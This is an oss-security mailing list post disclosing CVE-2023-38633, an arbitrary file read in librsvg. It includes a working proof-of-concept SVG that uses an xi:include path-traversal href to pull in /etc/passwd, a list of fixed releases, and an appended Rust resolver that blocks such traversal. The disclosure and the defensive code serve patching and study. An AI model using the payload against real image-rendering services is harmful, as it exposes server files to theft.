oss-sec mailing list archives

CVE-2023-38633 in librsvg: Arbitrary file read when xinclude href has special characters


From: Alan Coopersmith <alan.coopersmith () oracle com>
Date: Thu, 27 Jul 2023 13:36:17 -0700

I haven't seen this go by yet, so for those who haven't seen it:

https://gitlab.gnome.org/GNOME/librsvg/-/issues/996 reports:

CVE-2023-38633: Arbitrary file read when xinclude href has special characters

This was reported by Zac Sims.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
  <rect width="300" height="300" style="fill:rgb(255,255,255);" />
  <text x="10" y="100">
    <xi:include href=".?../../../../../../../../../../etc/passwd" parse="text" encoding="UTF-8">
      <xi:fallback>file not found</xi:fallback>
    </xi:include>
  </text>
</svg>

This ends up actually including the contents of /etc/passwd, bypassing the checks in UrlResolver::resolve_href().

The above linked bug report provides further analysis and links to merge requests for the fixes. Fixes have been published in new releases of
librsvg for many release trains:

    2.56.3
    2.55.3
    2.54.6
    2.52.10
    2.50.8
    2.48.11
    2.46.6

--
        -Alan Coopersmith-                 alan.coopersmith () oracle com
         Oracle Solaris Engineering - https://blogs.oracle.com/solaris
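For readers looking at the defensive side of this, the following is an added example (not librsvg's code, and not the fix linked from the bug report): a resolver for xi:include hrefs that treats the href as the plain relative filesystem path that will actually be opened, normalizes it lexically, and refuses anything that leaves the document's directory. The base directory and file names are assumed for illustration.

```rust
use std::path::{Component, Path, PathBuf};

/// Reasons an href must not be loaded.
#[derive(Debug, PartialEq)]
pub enum HrefError {
    NonFileScheme,
    EscapesBase,
}

/// Lexically collapse `.` and `..` without touching the filesystem.
/// Symlinks are not followed here; a real loader should also verify
/// the opened file's canonical path or refuse to follow symlinks.
fn normalize(path: &Path) -> PathBuf {
    let mut out = PathBuf::new();
    for part in path.components() {
        match part {
            Component::CurDir => {}
            Component::ParentDir => {
                out.pop();
            }
            other => out.push(other),
        }
    }
    out
}

/// Resolve `href` against `base_dir` as a filesystem path. Every
/// character of the href, including `?`, is part of the file name, so
/// the check is applied to the same path that would be opened.
pub fn resolve_include(base_dir: &Path, href: &str) -> Result<PathBuf, HrefError> {
    if href.contains("://") {
        return Err(HrefError::NonFileScheme);
    }
    let base = normalize(base_dir);
    // join() with an absolute href discards base_dir, which the
    // starts_with check below then rejects.
    let target = normalize(&base_dir.join(href));
    if target.starts_with(&base) {
        Ok(target)
    } else {
        Err(HrefError::EscapesBase)
    }
}

fn main() {
    // Assumed document directory; the href is the one from the report above.
    let base = Path::new("/home/user/docs");
    let href = ".?../../../../../../../../../../etc/passwd";
    println!("{:?}", resolve_include(base, href)); // Err(EscapesBase)
}
```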

